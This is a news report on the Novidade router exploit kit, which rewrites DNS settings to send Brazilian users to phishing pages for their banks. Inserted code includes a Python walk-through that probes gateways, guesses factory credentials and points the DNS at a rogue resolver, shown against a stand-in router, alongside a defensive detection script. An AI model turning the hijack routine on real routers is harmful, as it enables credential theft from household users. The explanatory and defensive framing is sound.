Attacks/Breaches
12/11/2018 05:20 PM
Attackers Using New Exploit Kit to Hijack Home & Small Office Routers

Goal is to steal banking credentials by redirecting users to phishing sites.

Small and home office routers are becoming major targets for criminals seeking to steal banking and other online account credentials belonging to Internet users.

The latest indication of the trend is "Novidade," a dangerous new exploit kit that multiple attack groups appear to be using to target routers belonging to millions of users in Brazil and, to a lesser extent, other parts of the world.

The kit is being used to change Domain Name System (DNS) settings on routers so that every name lookup from the network behind them is answered by a server the attackers control. When users of Novidade-infected routers attempt to reach certain target banks, for instance, their traffic is redirected to cloned versions of the login pages of the bank they are trying to access.

Security vendor Trend Micro has been tracking the threat for some time and estimates that one attack campaign alone has delivered Novidade at least 24 million times since March. Telemetry that the company has obtained suggests that attacks involving the malware may have begun in August 2017.

Most of the attacks have involved attempts to retrieve banking credentials from Internet users in Brazil. But some of the Novidade campaigns have involved targets in no specific geographic location, suggesting either that the attackers are expanding their efforts or that a large group of actors are using the kit, Trend Micro said in a report this week.

Attackers appear to have managed to compromise multiple router models using Novidade, Trend Micro said. Examples include D-Link's DSL-2740R and DIR 905L, Mediabridge's Medialink MWN-WAPR300, Motorola's SBG6580, and TP-Link's TL-WR340G and WR1043ND router models.

"The Novidade exploit kit is another proof point showing that attackers are shifting targets when attacking consumers," says Mark Nunnikhoven, Trend Micro's VP of cloud research. "This malware uses a foothold — your laptop or desktop — to attack the heart of the home network: your router."

By changing a router's DNS settings, attackers can attempt to compromise other devices on the network or phish for credentials at their leisure, Nunnikhoven says.

Novidade is the second major instance in recent months of cybercriminals using malware to change DNS settings on small office and home office (SOHO) routers in order to steal user credentials and conduct other malicious activities.

In August, security vendor Radware reported DNS hijacking attempts targeting Brazilian users of D-Link DSL modems. By October, the campaign had exploded in scope to target users of nearly six dozen router models in Brazil and elsewhere. Qihoo 360's Netlab team, which was the first to report on the increased scope, estimated that as many as 100,000 routers belonging mostly to users in Brazil had been compromised with versions of DNSChanger, a previously known router hijacking tool.

Earlier this year, the FBI warned of foreign cyber actors targeting SOHO routers with VPNFilter, a particularly pernicious malware tool capable of persisting through reboots and rendering infected routers unusable. VPNFilter is believed to have infected some 500,000 SOHO routers worldwide.

Trend Micro described attackers using a variety of methods to distribute Novidade. These include malvertising, website injections, and instant messages using the 2018 Brazilian presidential elections as a lure. "Once the victim receives and clicks the link to Novidade, the landing page will initially perform several HTTP requests generated by the JavaScript Image function to a predefined list of local IP addresses that are mostly used by routers," the vendor said.

If a connection is successfully established, Novidade then "blindly" attacks the IP address with all its exploits. Next, it tries to log in to the router using default account names and passwords, after which it executes an attack to change the router's DNS settings.
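The three stages described above (probe a list of likely gateway addresses, fire exploits, then fall back to factory credentials and rewrite the DNS setting) are walked through here as an added illustration. This is not Novidade's code: the "router" is an in-process HTTP stand-in on the loopback interface, the admin paths (`/dnscfg`, a `dns1` form field), the HTTP Basic auth, and the short credential list are all assumed for the example, and the exploit stage the kit runs before guessing credentials is not modelled.

```python
"""Walk-through of the LAN-side flow described above, added as an illustration;
this is not Novidade's code, and the 'router' is an in-process stand-in.

Assumed for the example: an admin UI whose front page answers any GET (that is all
the Image()-style probe learns), a POST /dnscfg form taking a dns1 field behind HTTP
Basic auth, and a short factory-credential list.  The exploit stage the kit runs
before guessing credentials is not modelled.
"""
import base64
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Iterable, List, Optional

DEFAULT_CREDS = [("admin", "admin"), ("admin", "password"), ("admin", "1234")]  # constructed list
ROGUE_DNS = "203.0.113.53"   # RFC 5737 documentation address standing in for the attacker's resolver


class FakeRouter(BaseHTTPRequestHandler):
    """Minimal router admin UI.  `state` is replaced per instance by start_router()."""
    state = {"user": "admin", "password": "admin", "dns": "0.0.0.0"}

    def _authorized(self) -> bool:
        hdr = self.headers.get("Authorization", "")
        if not hdr.startswith("Basic "):
            return False
        try:
            user, _, pw = base64.b64decode(hdr[6:]).decode().partition(":")
        except (ValueError, UnicodeDecodeError):
            return False
        return (user, pw) == (self.state["user"], self.state["password"])

    def do_GET(self):
        # Any page at all is enough for the probe: it only learns that something answered.
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"<title>Router</title>")

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if self.path != "/dnscfg" or not self._authorized():
            self.send_response(401)
            self.end_headers()
            return
        form = urllib.parse.parse_qs(body.decode())
        self.state["dns"] = form.get("dns1", [self.state["dns"]])[0]
        self.send_response(200)
        self.end_headers()

    def log_message(self, fmt, *args):
        pass   # keep the example quiet


def start_router(state: dict) -> str:
    """Serve a FakeRouter with its own mutable state on a free loopback port; return the base URL."""
    handler = type("Router", (FakeRouter,), {"state": state})
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}"


def probe(candidates: Iterable[str], timeout: float = 0.5) -> List[str]:
    """Stage 1: which candidate gateway addresses answer HTTP at all.  Any response,
    even an error page, counts; connection refused or a timeout does not."""
    alive = []
    for url in candidates:
        try:
            with urllib.request.urlopen(url, timeout=timeout):
                alive.append(url)
        except urllib.error.HTTPError:
            alive.append(url)
        except (urllib.error.URLError, OSError):
            pass
    return alive


def change_dns(base_url: str, user: str, pw: str, dns: str, timeout: float = 0.5) -> bool:
    """One attempt at the DNS form with a given credential.  With Basic auth the
    login and the settings change are the same request."""
    token = base64.b64encode(f"{user}:{pw}".encode()).decode()
    req = urllib.request.Request(
        base_url + "/dnscfg",
        data=urllib.parse.urlencode({"dns1": dns}).encode(),
        headers={"Authorization": "Basic " + token},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except (urllib.error.URLError, OSError):
        return False


def hijack(candidates: Iterable[str]) -> Optional[str]:
    """Stages 1 and 3 of the kit: probe, then walk the factory credentials against
    each live host until the DNS setting is rewritten.  Returns the URL that fell,
    or None when no candidate answered or no default credential worked."""
    for url in probe(candidates):
        for user, pw in DEFAULT_CREDS:
            if change_dns(url, user, pw, ROGUE_DNS):
                return url
    return None
```

Run against two stand-in routers, one with factory credentials and one with a changed password, `hijack()` rewrites only the first. The point the model makes is that nothing in this path crosses the WAN side of the router: the requests originate from a browser already on the LAN, so the factory credential and the predictable gateway address are what the kit depends on.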

Trend Micro says it has observed at least three variants of Novidade being used in the various attack campaigns. All three variants are delivered the same way and attack routers in the same manner. However, the newer variants have capabilities that the initial variant released in August 2017 did not have.

"The second version of Novidade added obfuscation to the JavaScript component, making it more difficult to detect," Nunnikhoven says. "The third version continued to refine that obfuscation technique and added the ability to detect the local IP address, setting up the possibility of highly targeted attacks."

The best way for users to mitigate their exposure to threats like Novidade is to ensure their routers are running the latest firmware with all available patches applied. Users should also change default usernames and passwords, change the router's default LAN IP address, and disable remote access features so an external actor cannot manipulate it, according to Trend Micro. Because Novidade reaches the router from a browser already inside the LAN, disabling WAN-side remote administration does not by itself block this path; changing the factory credentials and the predictable gateway address is what defeats the probing and credential-guessing stages described above.
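The symptom left behind by a DNS-changer is visible from any client on the LAN: the resolver handed out by DHCP is suddenly a public address that is neither the gateway nor a resolver anyone chose, and a bank's name resolves to addresses the rest of the Internet never sees. The check below combines those two signals. It is an added example, not Trend Micro's tooling; the function names, the `bank.example`/`news.example` names and every address in the sample data are constructed, and the lookups are passed in as callables so it can run offline (in practice `via_local` would query the configured resolver and `via_trusted` a DoH or well-known public resolver).

```python
"""Added host-side check for the symptom the article describes; not Trend Micro's tooling.

Two signals are combined: (1) the resolver a LAN client was handed is neither the
gateway nor an expected public/ISP resolver, and (2) a watched name resolves to
addresses a trusted resolver never returns.  Lookups are passed in as callables
so the logic can be exercised offline with constructed data.
"""
import ipaddress
from typing import Callable, Dict, Iterable, List, Set, Tuple

Lookup = Callable[[str], Set[str]]          # name -> set of IPv4 A records

# Real, widely used public resolvers a household might have chosen on purpose.
KNOWN_PUBLIC_RESOLVERS = {"1.1.1.1", "1.0.0.1", "8.8.8.8", "8.8.4.4", "9.9.9.9"}

# RFC 1918 ranges: a resolver in here (gateway, Pi-hole, NAS) is a LAN choice, not a hijack.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_resolv_conf(text: str) -> List[str]:
    """Pull nameserver lines out of /etc/resolv.conf-style text.  (On systemd-resolved
    hosts this shows 127.0.0.53; take the upstream from `resolvectl status` instead.
    On Windows the same information is under 'DNS Servers' in `ipconfig /all`.)"""
    servers = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers


def unexpected_resolvers(servers: Iterable[str], gateway: str,
                         isp_allow: Iterable[str] = ()) -> List[str]:
    """Configured resolvers that are neither the gateway, a LAN address, a loopback
    stub, a known public resolver, nor in the ISP allow-list.  An unknown public
    address here is the fingerprint of a DNS-changer: the router is now handing
    clients the attacker's server."""
    allowed = {gateway, *KNOWN_PUBLIC_RESOLVERS, *isp_allow}
    flagged = []
    for s in servers:
        if s in allowed:
            continue
        try:
            ip = ipaddress.ip_address(s)
        except ValueError:
            flagged.append(s)          # not even an address; worth a look
            continue
        if ip.is_loopback or any(ip in net for net in LAN_NETS):
            continue
        flagged.append(s)
    return flagged


def answer_mismatches(watched: Iterable[str], via_local: Lookup,
                      via_trusted: Lookup) -> Dict[str, Tuple[Set[str], Set[str]]]:
    """Names whose local answer shares no address with the trusted answer.
    Disjoint sets, not merely unequal ones, so CDN round-robin alone does not fire this."""
    out = {}
    for name in watched:
        local, trusted = via_local(name), via_trusted(name)
        if local and trusted and not (local & trusted):
            out[name] = (local, trusted)
    return out


def assess(resolv_text: str, gateway: str, watched: Iterable[str],
           via_local: Lookup, via_trusted: Lookup, isp_allow: Iterable[str] = ()) -> dict:
    """Combine both signals into a verdict a help-desk script could act on."""
    bad_resolvers = unexpected_resolvers(parse_resolv_conf(resolv_text), gateway, isp_allow)
    mismatches = answer_mismatches(watched, via_local, via_trusted)
    if bad_resolvers and mismatches:
        verdict = "hijack-likely"
    elif bad_resolvers or mismatches:
        verdict = "investigate"        # geo-specific CDN answers or a deliberate custom resolver
    else:
        verdict = "clean"
    return {"verdict": verdict, "resolvers": bad_resolvers, "mismatches": mismatches}
```

Either signal on its own is only a lead: a geographically split CDN will produce disjoint answers from two resolvers, and a user may legitimately have pointed the router at an ISP resolver that is not in the allow-list. Both together, on a name the household actually banks with, is the pattern the article describes.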

Malware like Novidade presents a threat mostly to consumers. In theory, the same conceptual attack could work against enterprises, Nunnikhoven notes. "[But] it's significantly more difficult given the separation of duties and layers of security controls around key assets like Dynamic Host Configuration Protocol (DHCP) servers and enterprise DNS resolution," he says.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...